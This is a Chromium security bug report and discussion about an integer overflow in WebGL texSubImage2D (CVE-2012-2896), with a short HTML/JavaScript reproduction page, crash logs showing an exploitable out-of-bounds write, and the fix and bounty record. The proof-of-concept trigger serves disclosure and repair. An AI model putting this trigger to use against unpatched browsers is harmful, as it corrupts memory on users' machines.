New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Last visit 17 days ago
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 145544: Security: integer overflow in gpu process with webgl

Reported by miau...@gmail.com, Aug 29 2012

Issue description

VULNERABILITY DETAILS
integer overflow in gpu process with webgl

this might be an asan bug.

chromium and chrome say:
[ERROR:gles2_cmd_decoder.cc(5133)] .WebGLRenderingContext: GL ERROR :GL_INVALID_VALUE : glTexSubImage2D: bad dimensions.

VERSION
Chrome Version: dev
Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <script>
      var gl = document.createElement("canvas").getContext('experimental-webgl')
      var texture = gl.createTexture()
      gl.bindTexture(gl.TEXTURE_2D, texture)
      gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 256, 256, 0, gl.RGBA, gl.UNSIGNED_BYTE, null)
      gl.texSubImage2D(gl.TEXTURE_2D, 0, 0, 0x7fffff00, 256, 256, gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array(256 * 256 * 4))
    </script>
  </head>
</html>

same problem with the large number in the x position.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: asan + gpu
Crash State: 

==2978== ERROR: AddressSanitizer unknown-crash on address 0x8000e033f080 at pc 0x55555f2a4310 bp 0x7fffffff7550 sp 0x7fffffff7308
READ of size 1 at 0x8000e033f080 thread T0
    #0 0x55555f2a430f in __interceptor_memcpy ??:0
    #1 0x7fffe95934c6 in ?? ??:0
==2978== AddressSanitizer CHECK failed: /usr/local/google/chrome/src/third_party/llvm/projects/compiler-rt/lib/asan/asan_report.cc:136 "((0 && "Address is not in memory and not in shadow?")) != (0)" (0x0, 0x0)
    #0 0x55555f2a923e in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) ??:0
    #1 0x55555f2a83a9 in __asan::DescribeAddressIfShadow(unsigned long) ??:0
 
overflow.html
443 bytes View Download
overflow.txt
1.3 KB View Download

Comment 1 by tsepez@chromium.org, Aug 30 2012

Cc: zmo@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit Feature-GPU-WebGL OS-All Mstone-22 SecSeverity-High SecImpacts-Stable SecImpacts-Beta
Owner: kbr@chromium.org

Comment 2 by scarybea...@gmail.com, Aug 30 2012

Cc: kcc@chromium.org
@kcc: ASAN bug or real?

Comment 3 by kcc@chromium.org, Aug 31 2012

Cc: glider@chromium.org
All I see now is a null deref, and asan is unable to unwind through it..

Comment 4 by glider@chromium.org, Aug 31 2012

Status: Assigned
The NULL deref is reproducible for me under Chrome built with just Clang (without ASan): https://crash.corp.google.com/reportdetail?reportid=b482b3a3089c9c91

Here's the crashing thread stack:


0x7f12a3cc6fc1	 [libc-2.11.1.so]	 + 0x00086fc1]	
0x7f129d6a06f5	 [libnvidia-glcore.so.295.71]	 + 0x010266f5]	
0x7f129d6aa7d9	 [libnvidia-glcore.so.295.71]	 + 0x010307d9]	
0x7f129d6a069f	 [libnvidia-glcore.so.295.71]	 + 0x0102669f]	
0x7f129d7afbcd	 [libnvidia-glcore.so.295.71]	 + 0x01135bcd]	
0x7f129d7a4bfa	 [libnvidia-glcore.so.295.71]	 + 0x0112abfa]	
0x7f1299db60f7	 [.com.google.Chrome.7YWdZV (deleted)]	 + 0x000100f7]	
0x7f1299db60f7	 [.com.google.Chrome.7YWdZV (deleted)]	 + 0x000100f7]	
0x7f1299db60f7	 [.com.google.Chrome.7YWdZV (deleted)]	 + 0x000100f7]

Comment 5 by zmo@chromium.org, Aug 31 2012

Cc: -zmo@chromium.org vangelis@chromium.org kbr@chromium.org gman@chromium.org
Owner: zmo@chromium.org
Ken is on vacation.  I'll take a look.

Comment 6 by scarybea...@gmail.com, Sep 6 2012

Labels: ReleaseBlock-Stable

Comment 7 by zmo@chromium.org, Sep 6 2012

Status: Started

Comment 8 by miau...@gmail.com, Sep 6 2012

works on intel

==7710== ERROR: AddressSanitizer crashed on unknown address 0x7fffe31a5000 (pc 0x7fffe9a5afc2 sp 0x7fffffff74a0 bp 0x000000000400 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fffe9a5afc2 (/usr/lib/x86_64-linux-gnu/dri/libdricore.so+0xdffc2)
Stats: 37M malloced (35M for red zones) by 50451 calls

Comment 9 by gman@chromium.org, Sep 7 2012

Owner: gman@chromium.org
This was a bug in the overflow math code

There's a CL here that fixes it
http://codereview.chromium.org/10916165/

Comment 11 by infe...@chromium.org, Sep 7 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
miaubiz, can you try on trunk so see if it fixes for you ?

Comment 12 by miau...@gmail.com, Sep 8 2012

fixed in 155560 for me

Comment 13 by scarybea...@gmail.com, Sep 8 2012

Labels: reward-topanel
@miaubiz: thanks. I'll get it merged for the upcoming Chrome 22 release.

We actually tracked this to a legitimate modern compiler optimization on tricky code. I wonder if other release compiles are affected? Win, Linux, ... if so, might be fun to try and read the OOB texture values via JS ;-) Rewards panel now loves that sort of thing.

Comment 14 by miau...@gmail.com, Sep 10 2012

@scarybeasts: can you please elaborate on what you mean, by the legitimate modern compiler optimization, and by how to proceed checking more stuff

Comment 15 by scarybea...@gmail.com, Sep 10 2012

@miaubiz: the problem is "signed arithmetic overflow behaviour" -- which is specifically undefined in the C standard. We had some code relying on it. Modern compilers will perform optimizations that break such code.

So, the clang / ASAN compiler you used to find this bug definitely has the optimization!

But what about Windows / MSVC? Does your test case reproduce on Windows?
How about a standard Linux build? That is compiled with GCC.

I think it'd be interesting, that's all :D

Comment 16 by miau...@gmail.com, Sep 10 2012

I see.

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --gpu-launcher="env CW_CURRENT_CASE=scarybeasts $HOME/crashwrangler/exc_handler" --incognito --disable-breakpad scarybeasts.html


Crashed thread log = 
: CrGpuMain  Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib             	0x951baa37 memmove$VARIANT$sse42 + 218
1   libGLImage.dylib              	0x98933e64 glgCopyRowsWithMemCopy(GLGOperationRec const*, unsigned long, GLDPixelModeRec const*) + 106
2   libGLImage.dylib              	0x98932823 glgProcessPixelsWithProcessor + 991
3   GLEngine                      	0x05f1d1aa gleTextureImagePut + 1167
4   GLEngine                      	0x05dc56fe glTexSubImage2D_Exec + 1882
5   libGL.dylib                   	0x92068546 glTexSubImage2D + 87
6   com.google.Chrome.framework   	0x02679fe8 ChromeMain + 39718232

---
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movdqa	%xmm0,(%edi,%edx):instruction_address=0x00000000951baa37:access_type=write:access_address=0x0000000007c0f000:

Comment 17 by miau...@gmail.com, Sep 10 2012

meanwhile on Safari, requires manually setting 'Enable WebGL' tho.

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib                   0x00007fff89385aa7 memmove$VARIANT$sse42 + 159
1   libGLImage.dylib                    0x00007fff86dc2acc glgCopyRowsWithMemCopy(GLGOperationRec const*, unsigned long, GLDPixelModeRec const*) + 129
2   libGLImage.dylib                    0x00007fff86dc1644 glgProcessPixelsWithProcessor + 885
3   GLEngine                            0x0000000150e6cf6d gleTextureImagePut + 1264
4   GLEngine                            0x0000000150d1bb7b glTexSubImage2D_Exec + 1720
5   libGL.dylib                         0x00007fff8e05d28a glTexSubImage2D + 77
6   com.apple.WebCore                   0x00007fff8506c583 WebCore::GraphicsContext3D::texSubImage2D(unsigned int, int, int, int, int, int, unsigned int, unsigned int, void const*) + 83
7   com.apple.WebCore                   0x00007fff858d83ea WebCore::WebGLRenderingContext::texSubImage2D(unsigned int, int, int, int, int, int, unsigned int, unsigned int, WTF::ArrayBufferView*, int&) + 426
8   com.apple.WebCore                   0x00007fff850599b2 WebCore::jsWebGLRenderingContextPrototypeFunctionTexSubImage2D(JSC::ExecState*) + 1602



Path:            /System/Library/PrivateFrameworks/WebKit2.framework/WebProcess.app/Contents/MacOS/WebProcess
Version:         8536 (8536.25)
OS Version:      Mac OS X 10.8.1 (12B19)

Comment 18 by scarybea...@gmail.com, Sep 10 2012

Nice. GCC on Mac clearly affected.

Comment 19 by kcc@chromium.org, Sep 10 2012

I thought we use Clang on Mac, not gcc

Comment 20 by scarybea...@gmail.com, Sep 10 2012

Oh, possibly my bad. XCode switched to clang?

Comment 21 by kcc@chromium.org, Sep 11 2012

>> XCode switched to clang?
Yep. (Long ago, I think)

Comment 22 by miau...@gmail.com, Sep 11 2012

yeah. apple ditched gcc a while back.

osx has no gpu sandbox right?

Comment 23 by scarybea...@gmail.com, Sep 11 2012

I think it does: content/common/sandbox_mac.mm

Comment 24 by scarybea...@gmail.com, Sep 17 2012

Labels: -Merge-Approved Merge-Merged

Comment 26 by scarybea...@gmail.com, Sep 25 2012

Labels: -reward-topanel reward-1000 reward-unpaid
@miaubiz: nice job for starting fuzzing on your Mac. Seems to be a new source of revenue :D
$1000

Comment 27 by miau...@gmail.com, Sep 27 2012

@scarybeasts: it says [Mac only] [$1000] [145544] High CVE-2012-2896: Integer overflow in WebGL. Credit to miaubiz.

this was on linux too (including intel) see c#0 and c#8

Comment 28 by scarybea...@gmail.com, Sep 27 2012

I think you were seeing it on Linux because ASAN builds use the Clang compiler.
Production Linux builds use GCC. GCC has been known to apply the same optimization but I don't see any crash logs against production builds? So hard to say :)

Comment 29 by scarybea...@gmail.com, Oct 11 2012

Labels: -reward-unpaid

Comment 30 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 31 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -Feature-GPU-WebGL -Mstone-22 -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta Cr-Content Cr-Internals-GPU-WebGL Security-Impact-Stable Security-Impact-Beta M-22 Security-Severity-High Type-Bug-Security

Comment 32 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify

Comment 33 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 34 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 35 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 36 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 37 by bugdroid1@chromium.org, Apr 10 2013

Project Member
Labels: -Cr-Internals-GPU-WebGL Cr-Blink-WebGL

Comment 38 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 39 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 40 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 41 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Sign in to add a comment